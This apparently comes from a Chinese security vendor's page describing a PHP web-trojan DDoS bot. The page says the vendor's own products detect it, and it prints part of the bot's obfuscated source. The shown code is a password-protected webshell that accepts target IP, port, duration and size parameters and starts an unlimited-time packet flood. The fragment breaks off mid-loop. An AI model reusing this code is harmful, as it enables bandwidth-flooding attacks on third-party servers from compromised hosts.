血腥DDOS攻击器

2011-12-21 15:14:18 来源:本站原创,请勿转载 浏览:881
血腥DDOS攻击器

木马名称:血腥DDOS攻击器
木马格式:php
默认密码:
木马作用:利用本机带宽,攻击其他服务器.

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)


总结:血腥DDOS攻击器属于php版ddos程序的一个变种,会一直往外发包攻击,占用了服务器带宽,可能有很多网站或者idc商会遇到这个情况.消耗完本机带宽,攻击其他服务器,罪恶!
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 血腥DDOS攻击器 这个php网页木马。

血腥DDOS攻击器代码片段:
<?php $oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0="wy123";
$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_SERVER["SERVER_NAME"]);
$ooooooooo0oo0oo0o0o0o0oO0OO0O0OOO0o0="5.1+";
$o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o="key.txt";
if(!oOo00o0OOo0o0000o0o0O($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o)){OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true);
}$Oooo0ooO0oo0ooooooo0 = include $o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o;
if(!isset($_GET["act"])){OOOOOOOOOOoOo00o0OOo0o0000o0o0O('<title>WWW.XXDDOS.COM</title><body style="background-color:#000000; margin:0px; text-align:center">
<a href="http://www.xxddos.com" target="_blank"><img src="http://www.xxddos.com/logo2.jpg" align="middle" border="0" width="400" height="160" style="margin-top:200px; margin-left:auto; margin-right:auto;" /></a>
</body>');
}if($_GET["act"]=="die"){if(!oo00o0OOo0o00O("fsockopen")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器缺少必要函数支持.");
}if(!oo00o0OOo0o00O("set_time_limit") or !oo00o0OOo0o00O("ignore_user_abort")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器无法启动自动攻击.");
}if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击.");
}OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true);
OOOOOOOOOOoOo00o0OOo0o0000o0o0O("died");
}if($_GET["act"]=="view"){if(!oo00o0OOo0o00O("fsockopen")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器缺少必要函数支持.");
}if(!oo00o0OOo0o00O("set_time_limit") or !oo00o0OOo0o00O("ignore_user_abort")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器无法启动自动攻击.");
}if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击.");
}OOOOOOOOOOoOo00o0OOo0o0000o0o0O("ok:".$ooooooooo0oo0oo0o0o0o0oO0OO0O0OOO0o0."|".$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0."|".$Oooo0ooO0oo0ooooooo0);
}
if($_GET["act"]=="attack"){
ignore_user_abort (true);
set_time_limit(0);
 $O0O0o0Oo0Oo0oO0oOoO0OOo00O00O0o0O0O0o0O0o0O0o000O0O0o = 0;
if(!isset($_GET["ip"]) or !isset($_GET["port"]) or !isset($_GET["exec_time"]) or !isset($_GET["att_size"])){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:参数提交错误");
}if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击.");
}OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"true\";\n?>",true);
$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_GET["ip"]);
$rand = oOo00o0OOo0o000000O($_GET["port"]);
$exec_time = oOo00o0OOo0o000000O($_GET["exec_time"]);
$att_size= oOo00o0OOo0o000000O($_GET["att_size"]);
$time =  time();
$max_time = $time+$exec_time;
$dosstr=OOOOO0o0o0o0o(100);
for($i=0;
$i<floor($att_size/100);
$i++){$out .= "X".$dosstr;

(0)
(0)